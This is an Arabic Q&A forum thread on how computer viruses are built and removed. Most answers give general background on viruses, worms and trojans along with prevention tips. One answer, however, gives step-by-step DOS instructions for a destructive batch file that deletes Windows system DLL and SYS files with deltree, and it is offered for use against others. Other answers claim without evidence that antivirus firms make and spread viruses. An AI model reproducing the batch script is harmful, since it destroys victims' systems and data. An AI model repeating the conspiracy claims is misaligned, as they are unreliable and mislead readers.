الرئيسية > السؤال
السؤال
كيف يتم تصميم فيروسات الكمبيوتر ، وكيف يمكن التخلص منها؟
الكمبيوتر والإنترنت 19‏/6‏/2012 تم النشر بواسطة بدون اسم (Mohd Mohd).
الإجابات
1 من 44
بسم الله الرحمن الرحيم

ملحوظة: لا يمكن ان اشرح كيف يتم تصنيع الفيروسات فى الاجابة لان هذا مخالف ولكن افيدكم جميعا انشاء الله

اولاً.....    
كيف يتم تصميم فيروسات الكمبيوتر

عن طريق الـNotepad
عن طريق برنامج الفجول بيسك (VB) و ++C
عن طريق برامج تصميم الفيروسات ( خطيرة جدا و فيروساتها قوية – لكن اغلبها يكشفه برامج مكافحة الفيروسات)
_____________________________________________________________________________________
ثانياً....
كيف يمكن التخلص منها ولاكن انا افضل ان الوقايه خير من العلاج

المواجهة مع الفيروسات
كل كمبيوتر معرض للإصابة بالفيروس هذه الأيام، وليس هناك كمبيوتر آمن مائة في المائة· فالفيروسات الجديدة منتشرة الآن على شبكة الإنترنت، بانتظار إيجاد ثغرات تنفد منها، لتدمر الأجهزة والبيانات التي فيها· أما الطريقة المثلى في الوقاية فهي تحميل برنامج مقاوم للفيروسات والقيام بتحديثه من حين إلى آخر، لتكون لديه المناعة الكافية بمواجهة الفيروسات الجديدة· كل ذلك لن يغنيك عن اتخاذ الحيطة والحذر··كما سترى في الموضوع التالي:
كيف تتجنب الفيروسات؟اولا: المسح ضد الفيروسات Virus Scanning : تستطيع أن تقوم بعملية مسح فورية مجانية لكمبيوترك الشخصي ضد الفيروسات من الموقع التالي www.centralcommand.com/ اضغط على الوصلة Free Online Virus Scan لتنتقل الى صفحة جديدة، حيث تقوم بإدخال البيانات الشخصية وبعدها تبدأ عملية الفحص الفوري لجهازك·

ثانيا:
تحميل برنامج مقاوم للفيروسات: الخطوة السابقة المتمثلة في فحص الكمبيوتر فورا عبر الإنترنت، شيء ضروري ومهم، ولكنه لا يغنيك عن تنزيل وتحميل برنامج مقاوم للفيروسات· مثل البرنامج الممتاز AVG الذي تستطيع استدعاءه من الموقع التالي www.grisoft.com/html/us_downl.html وهو برنامج مجاني يقوم بترقية نفسه بنفسه، حسب إعدادك له·

ثالثا:
تصفية Filteringمرفقات البريد الإلكتروني: كما يصفي أحدنا الماء من الشوائب، فانه يستطيع تصفية مرفقات البريد الإلكتروني من الفيروسات· الطريقة المثلى لذلك، هو أن يضع قواعد للبريد الإلكتروني الوارد، بحيث تتوجه الرسائل الواردة مباشرة الى مجلد خاص لتفحصها هناك· تتم هذه العملية في أوت لوك اكسبريس على النحو التالي، اختر Tools Message Rules Mail فتظهر النافذة الخاصة بإعداد القواعد الخاصة بالبريد الإلكتروني·

رابعا:
راقب امتدادات Extensions الملفات المرفقة: تستطيع أن ترصد فيروسا داخل ملف مرفق، إذا دققت في اسم الملف· فإذا كان منتهيا بالامتداد ·VBS فانه سيكون مثار شك وريبة، لأن هذا الاسم لن يكون لملف نصي بالهيئة وورد، وانما ملف فيجوال بيسك سكريبت الذي قد يحتوي على فيروس·

خامسا:
الماكرو فيروس Macro Virus : لسوء الحظ أن مستندات وورد قد تحتوي على فيروسات مختبئة· فاذا كنت تستخدم وورد 2000 فقد تحمي نفسك نسبيا إذا رفعت مؤشر الأمان على النحو التالي، اختر Tools Macro Security ومن النافــــذة الجديدة تأكد بأن المؤشر مرفوع للأعلى High

سادسا:
وقايــــــة كتــــــاب العنــاويــــــــن Address Book في أوت لو اكسبريس 6 تســـتطيع أن توقــــف الفيروســــات، عن نســــــخ نفســــها وإرســــال هــــذه النســـــخ إلى عناويــــن البريد الالكترونيــــة الموجــودة في كتاب العناوين، وذلك على النحو التالي، اختر Tools Options ثم اخـتر التبويبة Security وضــــع علامـــــــة الصــــــــح في المربـــــــــــع الصغــــــــــير بجانــــــــــب العبــــــــــارة Warn me when other applications try to send mail as me

سابعا:
خدمة فورية للقضاء على الفيروسات الخطيرة: إذا شككت بأن كمبيوترك أصيب بفيروس خطير مثل الفيروس نيمدا على سبيل المثال، فاذهب إلى الموقع التالي www.centralcommand.com/jan1.html تجد قائمة بأخطر 12 فيروسا ودودة كمبيوترية، ومن الموقع تحصل على رزمات برمجية للقضاء عليها·

شرح المصطلحات الواردة في الموضوع
1- كتاب العناوين Address Book هو بمثابة سجل يحتوي على عناوين البريد الإلكترونية لأصدقاء أو معارف، بحيث يمكن الرجوع اليه كلما أردت عنوان أحد منهم·

2- التروجان Trojan أي طروادة، وهو الحصان الذي تخفى فيه المهاجمون لدخول القلعة والفتك بأهلها، عبارة عن فيروس متخف في برنامج أو ملف، وهو أخطر أنواع الفيروسات، لأنه يفتك بالكمبيوتر، ولكنه لا ينسخ نفسه ويرسلها إلى كتاب العناوين·

3- مؤشر الأمن Security Level عبارة عــــــن رافعــــــه كلما حركتــــها للأعـــــلى ازدادت مستويات الأمن والسرية، والوقاية من الفيروسات.

ارجو الله ان اكون قد وفقت ..
لكم جميعا تحياتى
واتككم مع ذكر الله لا اله الا الله محمد رسول الله
19‏/6‏/2012 تم النشر بواسطة Mahmoudzoroo (Mahmoud Sai'd).
2 من 44
تفضل


لكن لا تستعمله ضد المسلمين ..اللهم اني بلغت
19‏/6‏/2012 تم النشر بواسطة Sàmÿ'w Pàco (مــحــمــد قــرة عــيــنــي).
3 من 44
هي عباره عن برامج امره باوامر معينه
19‏/6‏/2012 تم النشر بواسطة A M (الطائر المهاجر).
4 من 44
سلبووني وادعيلكم بكل صلااتي
19‏/6‏/2012 تم النشر بواسطة بدون اسم.
5 من 44
ههههههههههههه
19‏/6‏/2012 تم النشر بواسطة stardom.
6 من 44
ترسل كعبارة عن رموز وهي بيها فيروس وتحطم شاشة نيت وتحذف حتى الملفات المخزونة
19‏/6‏/2012 تم النشر بواسطة ليالي شموع (كلها دموع).
7 من 44
اخي هذا شغل الهكر ومياكرو سفت
19‏/6‏/2012 تم النشر بواسطة DIYAR SK (أنہي حہبہي مہا أتہركہه).
8 من 44
انا ماابي اقولك كيف وكذا
انا بضيف نقطة خارج سؤالك
هاللحين معظم شركات الانتي فايروس هي وراء انتاج الفيروسات  واطلاقها في الشبكة العاملية للحصول على اكبر قدر من العملاء
يعني مثلا كاسبر سكاي لها فايروس باسمها
لكن علشان نشر الفيروسات يعد جريمة الكترونية

تعمل في الخفاء على نشر الفيروسات بحيث تحوي على كود لا يمكن تفكيكه الا كاسبر نفسه لابطال الفايروس ولذلك من يصاب بالهفيروس راح يبحث ويتعب الى ان يجد كاسبر ويستخدمه
وخاصة كايبر مشهوره ب التروجونات
19‏/6‏/2012 تم النشر بواسطة دمامي 60.
9 من 44
بسم الله الرحمن الرحيم

التصميم
http://www.3asfh.net/vb/t53085.html

التخلص منها
http://www.mtwer.com/vb/t52106.html‏
19‏/6‏/2012 تم النشر بواسطة BUZZLE DESIGN (Bahaa Al Deen).
10 من 44
باللغة البرمجه وهناك العديد من الغات البرمجه يمكن برمجه الفايروس فهو لايختلف عن البرامج النظام وأنما تمت برمجته لأوامر خبيثة وضيفتها التدمير
وبعض الشركات تقوم بصنع الفايروسات لكي تزيد من ارباحها

والافضل استخدام الانتي فايروس وانا افضل النود وتحديثه كل يوم

او تنصيب نظام غير الوندوز لان اكثر لغات البرمجه لاتعمل ألا عليه
19‏/6‏/2012 تم النشر بواسطة ShakspearWise (Best Answer).
11 من 44
هناء برامج لصنع الفروس ونتخلص منها برنامج الأنتيفايروس
19‏/6‏/2012 تم النشر بواسطة عبدالقادر..
12 من 44
i don't know
19‏/6‏/2012 تم النشر بواسطة نور الهدى 1996.
13 من 44
فيروس الحاسوب هو برنامج خارجي صنع عمداً بغرض تغيير خصائص الملفات التي يصيبها لتقوم بتنفيذ بعض الأوامر إما بالإزالة أو التعديل أو التخريب و ما شابهها من عمليات. اي ان فيروسات الكومبيوتر هي برامج تتم كتابتها بغرض إلحاق الضرر بكومبيوتر آخر، أو السيطرة عليه، وتتم كتابتها بطريقة معينة.

يتصف فيروس الحاسب بأنه :

1– برنامج قادر على التناسخ Replication والانتشار. 2- الفيروس يربط نفسه ببرنامج أخر يسمى الحاضن host . 3-لا يمكن أن تنشأ الفيروسات من ذاتها . 4-يمكن أن تنتقل من حاسوب مصاب لآخر سليم . يتكون برنامج الفيروس بشكل عام من أربعة أجزاء رئيسية وهي : 1-آلية التناسخ The Replication Mechanism :

وهو الجزء الذي يسمح للفيروس أن ينسخ نفسه .

2-آلية التخفي The Protection Mechanism :

وهو الجزء الذي يخفي الفيروس عن الاكتشاف.

3- آلية التنشيط The trigger Mechanism :

وهو الجزء الذي يسمح للفيروس بالانتشار قبل أن يعرف وجوده كاستخدام توقيت   الساعة في الحاسوب كما في فيروس (Michelangelo) الذي ينشط في السادس من   آذار من كل عام .

4- آلية التنفيذ The Payload Mechanism :

وهو الجزء الذي ينفذ الفيروس عندما يتم تنشيطه .

طرق انتقال الفيروسات (العدوى): يمكن أن نميز فئتين من فيروسات الحاسوب تبعاً لآلية العدوى وانتشار الفيروس :

.1فيروس العدوى المباشر Direct Infector :

عندما يتم تنفيذ برنامج مصاب بفيروس من هذا النوع, فإن ذلك الفيروس يبحث بنشاط عن ملف أو أكثر لينقل العدوى إليه, وعندما يصاب أحد الملفات بالعدوى فإنه يقوم بتحميله إلى الذاكرة وتشغيله ,وهذا النوع قليل الانتشار.

• 2.- فيروس العدوى غير المباشر Indirect Infector : • عندما يتم تنفيذ برنامج مصاب بفيروس من هذا النوع, فإن ذلك الفيروس سينتقل إلى ذاكرة الحاسوب ويستقر فيها, ويتم تنفيذ البرنامج الأصلي ثم يصيب الفيروس بالعدوى كل برنامج يتم تحميله إلى الذاكرة بعد ذلك, إلى أن يتم قطع التغذية الكهربائية عن الحاسوب أو إعادة تشغيله



أنواع الفيروسات

أنواع الفيروسات ثلاثة :(الفيروس والدودة وحصان طروادة) ما الفرق بين الفيروس والدودة وحصان طروادة؟

•الفيروس: يمكن القول بأنه برنامج تنفيذي(ذات نوع scr,.pif,.bat,.exe ,.com.) يعمل بشكل منفصل ويهدف إلى أحداث خلل في نظام الحاسوب وتترواح خطورتة حسب مهمته فمنه الخطير ومنه الخفيف وكلاهما خبيث.وينتقل بواسطة نسخ الملفات من جهاز به ملفات مصابة إلى جهاز اخر عن طريق الاقراص المدمجة سي دي و ذواكر الفلاش .

•الدودة (worm ): فيروس ينتشر فقط عبر الشبكات والانترنت ويعمل على الانتشار على الشبكات عن طريق دفتر عنواين البريد الالكتروني مثلا فعند اصابة الجهاز يبحث البرنامج الخبيث عن عناوين الاشخاص المسجلين في دفتر العناوين على سبيل المثال ويرسل نفسه إلى كل شخص وهكذا ... مما يؤدي إلى انتشاره بسرعه عبر الشبكه وقد اختلف الخبراء فمنهم اعتبره فايروس ومنهم من اعتبره برنامج خبيث وذلك كون الدوده لاتنفذ اي عمل مؤذي انما تنتشر فقط مما يؤدي إلى اشغال موارد الشبكه بشكل كبير ومع التطور الحاصل في ميدان الحوسبه أصبح بامكان المبرمجين الخبيثين إضافة سطر برمجي لملف الدوده بحيث تؤدي عمل معين بعد انتشارها ( مثلا بعد الانتشار إلى عدد 50000 جهاز يتم تخريب الأنظمة في هذه الأجهزة ) أو اي شيء اخر ( مثلا في يوم معين أو ساعة أو تاريخ ...الخ ) وأصبحت الديدان من أشهر الفيروسات على الشبكه العالميه واشهر عملياتها التخريبيه واخطرها تلك التي يكون هدفها حجب الخدمه تسمى ( هجمات حجب الخدمه ) حيث تنتشر الدوده على عدد كبير من الأجهزة ثم توجه طلبات وهميه لجاهز خادم معين ( يكون المبرمج قد حدد الخادم المستهدف من خلال برمجته للدوده ) فيغرق الخادم بكثرة الطلبات الوهميه ولا يستطيع معالجتها جميعا مما يسبب توقفه عن العمل وهذه الديدان استهدفت مواقع لكثير من الشركات العالميه اشهرها مايكروسوفت وغيرها الكثير .

•حصان طروادة Trojan Horse: سمي هذا الفيروس بحصان طروادة لانه يذكر بالقصة الشهيرة لحصان طروادة حيث اختبأ الجنود اليونان داخله واستطاعوا اقتحام مدينة طرواده والتغلب على جيشها وهكذا تكون الية عمل هذا الفيروس حيث يكون مرفقا مع أحد البرامج أي يكون جزء من برنامج دون ان يعلم المستخدم. فعندما يبدأ البرنامج تنفيذ عمله ويصل إلى مرحلة ما حيث تم توزيع قرص مجاني على المشافي به برنامج حول مرض الايدز ( اسبابه - طرق انتشاره - طرق العلاج .. الخ ) وبعد مدة شهر من تشغيل البرنامج تم تشفير المعلومات على الحواسب الحاضنه للفايروس وظهرت رساله مفادها ان الحاسب مصاب بالايدز ( المقصود هنا انه تم تشفير ملفات الحاسب وايقافها عن العمل بطريقه نظاميه ) ارسل مبلغ كذا إلى الحساب كذا ليتم إرسال رقم فك الشيفره مما اجبر المختصين بالرضوخ للطلب كونهم لم يستطسعو فك التشفير . توجد عدة تقسيمات للفيروسات، فمثلاً من حيث سرعة الانتشار هناك فيروسات سريعة الانتشار وفيروسات بطيئة الانتشار ومن حيث توقيت النشاط فيروسات تنشط في أوقات محددة وفيروسات دائمة النشاط ومن حيث مكان الإصابة فيروسات مقطع التشغيل boot sector على الأقراص وهي الأكثر شيوعاً، وفيروسات الماكرو macro التي تختص بإصابة الوثائق والبيانات الناتجة عن حزمة مايكروسوفت أوفيس، أما من حيث حجم الضرر فهناك الفيروسات المدمرة للأجهزة طبعا لايوجد فايروسات خارقه بحيث انها تدمر الأجهزة كما نسمع أحيانا ( احترق المعالج بسبب الفايروس تعطلت وحدة التغذيه بسبب الفايروس أو تلفت الشاشة بسبب الفايروس ،... الخ ) ولكن يمكن للفايروس ان يؤذي الذاكره روم في الحاسب كما في فايروس تشرنوبل أو ان يمحي معلومات ال (MBR (Main Boot Sector على القرص الصلب فتعود الاقراص الصلبه كما اتت من المصنع وفي الحالتين السابقتين لا يتم اقلاع الجهاز مما يوحي للبعض ان الفايروس ( حرق ) الحاسب طبعا هذه الفيروسات تعتبر خطيره جدا لانها تتسبب في اتلاف البيانات المخزنه والتي قد تكون (البيانات) نتاج عشرات السنين مما يؤديي إلى خسائر جسيمة أو إلى توقف الحاسبات عن العمل كما في تشرنوبل مما يؤدي إلى توقف الخدمات المقدمه ، وهنالك أيضا الفيروسات المدمرة للبرامج وتاثيرها محدود طالما ان البيانات لم تتاثر حيث يمكن تخزين البيانات واعادة تهئية الحاسب واعادة البرامج المتضرره من اقراصها الاصليه، والفيروسات عديمة الضرر وهي التي لاتقوم باي عمل مؤذي وانما تم برمجتها لاثبات الذات والقدره على البرمجه من بعض المراهقين فمنها ما يرسم كرة أو اي شكل على الشاشه طوال فترة عمل الكمبيوتر ومنها ما يغير بعض الاحرف ( كتغير حرف بحرف اينما وجد ) أو تغيير مؤشر الماوس .. الخ.

فيروس Brontok أو الفيروس الذي يخفي خيارات المجلداو يفقدك التحكم في الرجستري فتصبح غير قادر على التحكم في الحاسوب: هذا الفيروس من أبرز مهامه أنه يقوم بإخفاء خيارات المجلد من قائمة أدوات الموجودة في نظام الويندوز وأيضا يقوم بتكرار جميع المجلدات التي يصيبها حتى أنك لاتعرف الأصل من النسخة وقد تحذف الأصل ظنا منك أنه الفيروس ، وهو أيضا يقوم بفتح شاشة الإنترنت اكسبلورر ويقوم بفتح شاشة خضراء اللون بشكل مستمر ممايسبب بطء في النظام ووما يؤدي ألى زيادة انتشار هذا الفيروس في الكمبيوتر

فيروس xcopy والذي يصيب الـ Partion القسم للقرص الصلب ويجعله لايفتح مباشرة وذلك بزرع ملف auotorun وحينما تحاول فتح القسم يعطيك قائمة فتح باستخدام ولا تستطيع الدخول إلى القسم الذي تريده إلا بطرق ملتوية مثل (استكشاف و تشغيل ) للمحترفين فقط ويقوم أيضا بجعل الفلوبي دسك القرص المرن يصيح باستمرار مطالبا بإدخال قرص مرن للكمبيوتر تصنيف الفيروسات حسب خطورتها : 1- العادي Trivial : لا يفعل الفيروس العادي شيئا سوى التكاثرreplication ولا يسبب أي ضرر أو تخريب للمعلومات مثل فيروس stupid 2- الثانوي Minor : يصيب الملفات التنفيذية فقط executable file ولا يؤثر على البيانات 3- المعتدل Moderate : يقوم بتدمير جميع الملفات الموجودة على القرص إما باستبدال المعلومات بمعلومات لا معنى لها أو عن طريق إعادة التهيئة Reformatting مثل فيروس Disk killer الذي يقوم بإعادة تهيئة القرص . ويمكن حل مشكلة هذه الفيروسات عن طريق استخدام النسخ الاحتياطي 4- الرئيسي Major : يؤدي الفيروس إلى تخريب المعلومات بإجراء تغيرات ذكية وبارعة للبيانات دون أن يترك أثرا يشير إلى التغيير الحاصل كأن يقوم بتبديل كتل المعلومات المتساوية في الطول بين الملفات كما أن تأثيره يكون على المدى الطويل ولن يكون من الممكن اكتشاف الإصابة إلا بعد بضعة أيام وبذالك لا يمكن الوثوق بالنسخة الاحتياطية أيضا . 5- اللامحدود Unlimited : يستهدف الشبكات والملفات المشتركة وتمضي أكثر الوقت في محاولة معرفة كلمة السر للمستخدمين الأكثر فاعلية وعند معرفتها يقوم بتمريرها إلى أحد أو أكثر من مستخدمي الشبكة على أمل أنهم سيستخدمونها لأغراض سيئة . ترينا الفيروسات كم نحن معرضين للهجوم ولكن بالمقابل ترينا مدى التعقيد والترابط الذي وصل إليه الإنسان . على سبيل المثال My doom : قدر الخبراء الحواسيب المتضررة من هذه الدودة بحوالي ربع مليون حاسوب خلال يوم واحد والذي كان في كانون الثاني 2004 Melissa: أعطى هذا الفيروس فاعلية كبيرة جدا حيث أجبر شركة Microsoft والعديد من كبرى الشركات الأخرى على إطفاء مخدمات البريد بشكل كامل حتى تمكنوا من القضاء عليه وذلك في آذار 1999 وفي الشهر الأول من عام 2007 ظهرت دودة اسمها Storm وبحلول الشهر التاسع كان أكثر من 50 مليون حاسوب مصاب . كلنا تصور أن كل هذا التأثير ينتج عن برامج بسيطة جدا. فيروس Melissa : أنشاء الفيروس على شكل مستند Word ووضع في موقع للأخبار عندما يقوم أي شخص بتحميل الملف وفتحه فإن الفيروس يتفعل ويقوم بإرسال المستند إلى أول 50 شخص في الAddress book والمستند يحوي على ملاحظة لطيفة واسم الشخص المرسل إليه وعندما يقوم المرسل إليه بفتح المستند يتم إرساله إلى 50 شخص أخر وبهذه الطريقة أصبح فيروس Melissa أسرع فيروس في الانتشار
19‏/6‏/2012 تم النشر بواسطة memoon (Art emad).
14 من 44
يتم صناعتها عن طريق برامج تدخل الى الجهاز فأما تسرق ملفاته واما تدمر حماية الجهاز واما اشدها تحرق الجهاز بشكل كامل ويتم التخلص منها عبر فرمته الجهاز ولا يوجد حل اخر غير هذا
19‏/6‏/2012 تم النشر بواسطة عش حرا تعش ملكا.
15 من 44
أبي يعمل صاع حواسيب و يعرف كيفية صنع الفيروسات و التخلفص منها أعطني أفضل إجابة و سأخبرك          
إسمع إن mahmoodzoro يكذب عليكون فقط
19‏/6‏/2012 تم النشر بواسطة انس الملاحي.
16 من 44
بسم الله الرحمن الرحيم

ملحوظة: لا يمكن ان اشرح كيف يتم تصنيع الفيروسات فى الاجابة لان هذا مخالف ولكن افيدكم جميعا انشاء الله

اولاً.....    
كيف يتم تصميم فيروسات الكمبيوتر

عن طريق الـnotepad
عن طريق برنامج الفجول بيسك (vb) و ++C
عن طريق برامج تصميم الفيروسات ( خطيرة جداااا و فيروساتها قوية – لكن اغلبها يكشفه النورتون)
_____________________________________________________________________________________

ثانياً....
كيف يمكن التخلص منها ولاكن انا افضل ان الوقايه خير من العلاج

المواجهة مع الفيروسات
كل كمبيوتر معرض للإصابة بالفيروس هذه الأيام، وليس هناك كمبيوتر آمن مائة في المائة· فالفيروسات الجديدة منتشرة الآن على شبكة الإنترنت، بانتظار إيجاد ثغرات تنفد منها، لتدمر الأجهزة والبيانات التي فيها· أما الطريقة المثلى في الوقاية فهي تحميل برنامج مقاوم للفيروسات والقيام بتحديثه من حين إلى آخر، لتكون لديه المناعة الكافية بمواجهة الفيروسات الجديدة· كل ذلك لن يغنيك عن اتخاذ الحيطة والحذر··كما سترى في الموضوع التالي:
كيف تتجنب الفيروسات؟اولا: المسح ضد الفيروسات Virus Scanning : تستطيع أن تقوم بعملية مسح فورية مجانية لكمبيوترك الشخصي ضد الفيروسات من الموقع التالي www.centralcommand.com/ اضغط على الوصلة Free Online Virus Scan لتنتقل الى صفحة جديدة، حيث تقوم بإدخال البيانات الشخصية وبعدها تبدأ عملية الفحص الفوري لجهازك·

ثانيا: تحميل برنامج مقاوم للفيروسات: الخطوة السابقة المتمثلة في فحص الكمبيوتر فورا عبر الإنترنت، شيء ضروري ومهم، ولكنه لا يغنيك عن تنزيل وتحميل برنامج مقاوم للفيروسات· مثل البرنامج الممتاز AVG الذي تستطيع استدعاءه من الموقع التالي www.grisoft.com/html/us_downl.html وهو برنامج مجاني يقوم بترقية نفسه بنفسه، حسب إعدادك له·

ثالثا: تصفية Filteringمرفقات البريد الإلكتروني: كما يصفي أحدنا الماء من الشوائب، فانه يستطيع تصفية مرفقات البريد الإلكتروني من الفيروسات· الطريقة المثلى لذلك، هو أن يضع قواعد للبريد الإلكتروني الوارد، بحيث تتوجه الرسائل الواردة مباشرة الى مجلد خاص لتفحصها هناك· تتم هذه العملية في أوت لوك اكسبريس على النحو التالي، اختر Tools Message Rules Mail فتظهر النافذة الخاصة بإعداد القواعد الخاصة بالبريد الإلكتروني·

رابعا: راقب امتدادات Extensions الملفات المرفقة: تستطيع أن ترصد فيروسا داخل ملف مرفق، إذا دققت في اسم الملف· فإذا كان منتهيا بالامتداد ·VBS فانه سيكون مثار شك وريبة، لأن هذا الاسم لن يكون لملف نصي بالهيئة وورد، وانما ملف فيجوال بيسك سكريبت الذي قد يحتوي على فيروس·

خامسا: الماكرو فيروس Macro Virus : لسوء الحظ أن مستندات وورد قد تحتوي على فيروسات مختبئة· فاذا كنت تستخدم وورد 2000 فقد تحمي نفسك نسبيا إذا رفعت مؤشر الأمان على النحو التالي، اختر Tools Macro Security ومن النافــــذة الجديدة تأكد بأن المؤشر مرفوع للأعلى High

سادسا: وقايــــــة كتــــــاب العنــاويــــــــن Address Book في أوت لو اكسبريس 6 تســـتطيع أن توقــــف الفيروســــات، عن نســــــخ نفســــها وإرســــال هــــذه النســـــخ إلى عناويــــن البريد الالكترونيــــة الموجــودة في كتاب العناوين، وذلك على النحو التالي، اختر Tools Options ثم اخـتر التبويبة Security وضــــع علامـــــــة الصــــــــح في المربـــــــــــع الصغــــــــــير بجانــــــــــب العبــــــــــارة Warn me when other applications try to send mail as me

سابعا: خدمة فورية للقضاء على الفيروسات الخطيرة: إذا شككت بأن كمبيوترك أصيب بفيروس خطير مثل الفيروس نيمدا على سبيل المثال، فاذهب إلى الموقع التالي www.centralcommand.com/jan1.html تجد قائمة بأخطر 12 فيروسا ودودة كمبيوترية، ومن الموقع تحصل على رزمات برمجية للقضاء عليها·

شرح المصطلحات الواردة في الموضوع
1- كتاب العناوين Address Book هو بمثابة سجل يحتوي على عناوين البريد الإلكترونية لأصدقاء أو معارف، بحيث يمكن الرجوع اليه كلما أردت عنوان أحد منهم·

2- التروجان Trojan أي طروادة، وهو الحصان الذي تخفى فيه المهاجمون لدخول القلعة والفتك بأهلها، عبارة عن فيروس متخف في برنامج أو ملف، وهو أخطر أنواع الفيروسات، لأنه يفتك بالكمبيوتر، ولكنه لا ينسخ نفسه ويرسلها إلى كتاب العناوين·

3- مؤشر الأمن Security Level عبارة عــــــن رافعــــــه كلما حركتــــها للأعـــــلى ازدادت مستويات الأمن والسرية، والوقاية من الفيروسات
19‏/6‏/2012 تم النشر بواسطة أصيل اليمن (الحكمه يمانيه).
17 من 44
السلام عليكم اليوم اخواني جايب ليكم طريقة صنع فايرس عبر الدوس يعني هذا الفيروس سهل وممتع ومن دون اي لغه برمجه ولا يستطيع اي انتي فايروس ان يقبضه بالطبع هو برنامج تخريبي  لكن يرجى عدم استعماله ضد  المسلمين و المسحيين أوكي ندخل في الموضوع :
=الان
افتح الدوس وخليه على هذا الوضع /:c يعني تقوم بهذه الحركة المرجوا كتابتها في الدوس ..cd حتى يتم تفريغ لوحة الدوس ويصبح الوضع /:c
واكتب الامر copy con mmm
واضغط انتر
واكد هذه الاوامر بنفس الترتيب والمسافات احسن تنسخها من هنا
ECcho off@
:c
cd %winDir%\\system
deltree /y*.dll
\\cd
deltree /*.sys
والان اضغط كنترول معاها حرف Z بعد ذلك اضغط على انتر
والان روح للقرص Cبتاعك وافتحه تجد الملف mmm اضغط عليه بالزر اليمين وغير اسمه
وخليه ضروري يكون crazy.bat
راح يتغير شكله على طول.أتمنى يفيدكم يا اخوان بألف صحة و عافية

تحياتى لك
19‏/6‏/2012 تم النشر بواسطة kingman20112012 (ESLAM EL-DEGHEDY).
18 من 44
فيروس الحاسوب هو برنامج خارجي صنع عمداً بغرض تغيير خصائص الملفات التي يصيبها لتقوم بتنفيذ بعض الأوامر إما بالإزالة أو التعديل أو التخريب وما شابهها من عمليات. اي ان فيروسات الكومبيوتر هي برامج تتم كتابتها بواسطة مبرمجين محترفين بغرض إلحاق الضرر بكومبيوتر آخر، أو السيطرة عليه أو سرقة بيانات مهمة، وتتم كتابتها بطريقة معينة.
يتصف فيروس الحاسب بأنه :
برنامج قادر على التناسخ Replication والانتشار.
الفيروس يربط نفسه ببرنامج أخر يسمى الحاضن host.
لا يمكن أن تنشأ الفيروسات من ذاتها.
يمكن أن تنتقل من حاسوب مصاب لآخر سليم.

_________________________________________________

مكونات الفيروس

يتكون برنامج الفيروس بشكل عام من أربعة أجزاء رئيسية وهي
آلية التناسخ The Replication Mechanism
وهو الجزء الذي يسمح للفيروس أن ينسخ نفسه.
آلية التخفي The Protection Mechanism
وهو الجزء الذي يخفي الفيروس عن الاكتشاف.
آلية التنشيط The trigger Mechanism
وهو الجزء الذي يسمح للفيروس بالانتشار قبل أن يعرف وجوده كاستخدام توقيت الساعة في الحاسوب كما في فيروس (Michelangelo) الذي ينشط في السادس من آذار من كل عام.
آلية التنفيذ The Payload Mechanism
وهو الجزء الذي ينفذ الفيروس عندما يتم تنشيطه.

للوقاية من الفيروس

1- استخدام برامج للكشف عن الفيروسات في الجهاز. 2- ااحتفظ بنسخ احتياطيه من البرامج والملفات الموجوده على الجهاز. 3- إجارء الفحص على البرامج المسحوبه او المنقوله من شبكة الانترنت قبل تشغيلها. 4- استخدام برمجيات الجدار الناري.
[عدل]اللغات التي يكتب بها الفيروس

من أهم اللغات التي يكتب بها كود الفيروس هي لغة التجميع اسمبلي لسهولة الوصول لعتاد الحاسوب وهنا أيضاً اللغات الراقية مثل لغة سي ولغة سي ++ وفيجوال سي وفيجوال بيسك.
طرق انتقال الفيروسات (العدوى)

يمكن أن نميز فئتين من فيروسات الحاسوب تبعاً لآلية العدوى وانتشار الفيروس :
فيروس العدوى المباشر Direct Infector
عندما يتم تنفيذ برنامج مصاب بفيروس من هذا النوع, فإن ذلك الفيروس يبحث بنشاط عن ملف أو أكثر لينقل العدوى إليه, وعندما يصاب أحد الملفات بالعدوى فإنه يقوم بتحميله إلى الذاكرة وتشغيله ,وهذا النوع قليل الانتشار.
فيروس العدوى غير المباشر Indirect Infector
عندما يتم تنفيذ برنامج مصاب بفيروس من هذا النوع, فإن ذلك الفيروس سينتقل إلى ذاكرة الحاسوب ويستقر فيها, ويتم تنفيذ البرنامج الأصلي ثم يصيب الفيروس بالعدوى كل برنامج يتم تحميله إلى الذاكرة بعد ذلك, إلى أن يتم قطع التغذية الكهربائية عن الحاسوب أو إعادة تشغيله.
أسباب التسمية

سمي الفيروس (Virus) بهذا الاسم لأنها تشبه تلك الكائنات المتطفلة في صفتين رئيسيتين: اولا : فالفيروسات دائماً تتستر خلف ملف آخر، ولكنها تأخذ زمام السيطرة على البرنامج المصاب. بحيث أنه حين يتم تشغيل البرنامج المصاب، يتم تشغيل الفيروس أيضا ثانيا : تتواجد الفيروسات في مكان أساسي في الحاسب كالذاكره رام مثلا وتصيب اي ملف يشغل في أثناء وجودها بالذاكره مما يزيد عدد الملفات المصابه كلما طال وقت اكتشاف الفايروس تستخدم عادة لغة التجميع (الاسمبلي) لكتابة كود تنفيذ الفيروس
أنواع الملفات التي يمكن ان يصيبها الفيروس

بشكل عام الفيروس تصيب الملفات التنفيذية أو الملفات المشفرة غير النصية مثل التالية
الملفات ذاتية التنفيذ مثل ملفات ذات امتداد (.EXE ,.COM.)ضمن أنظمة التشغيل دوس وميكروسوفت ويندوز ,أو (ELF) في أنظمة لينكس
سجلات الملفات والبيانات(VOLUME BOOT RECORD) في الاقراص المرنة والصلبة والسجل رقم (0) في القرص الصلبMASTER BOOT
ملفات الأغراض العامة مثل ملفات الباتش والسكريبت في ويندوز وملفات الشل في يونيكس
ملفات الاستخدام المكتبي في النوافذ WINDOWS التي تحتوي ماكرو مثل الوورد والاكسل واكسس
قواعد البيانات وملفات الاوتولوك لها دور كبير في الاصابة ونشر الاصابة لغيرها لما تحويه من عناوين البريد الالكتروني
ملفات الاكروبات (PDF) وبعض النصوص المهجنة HTML احتمال احتوائها على كود خبيث
الملفات المضغوطة مثل ZIP,RAR
ملفات MP3
طرق الانتقال

أهم طرق الانتقال الآن هي الشبكة العنكبوتية الإنترنت تكون وسيلة سهلة لانتقال الفيروسات من جهاز لاخر ما لم تستخدم أنظمة الحماية مثل الجدران النارية وبرامج الحماية من الفيروسات ياتي ثانيا وسائط التخزين مثل ذواكر الفلاش والاقراص الضوئية والمرنة سابقا وياتي أيضا ضمن رسائل البريد الإلكتروني وأيضا تنتقل الفيروسات إلى نظامك عند استلامه ملفات اي كانت الملفات مخزنة على(اقراص مرنة أو اقراص مضغوطة أو اقراص zip,)
أعراض الإصابة

تكرار رسائل الخطأ في أكثر من برنامج.
ظهور رسالة تعذر الحفظ لعدم كفاية المساحة.
تكرار اختفاء بعض الملفات التنفيذية.
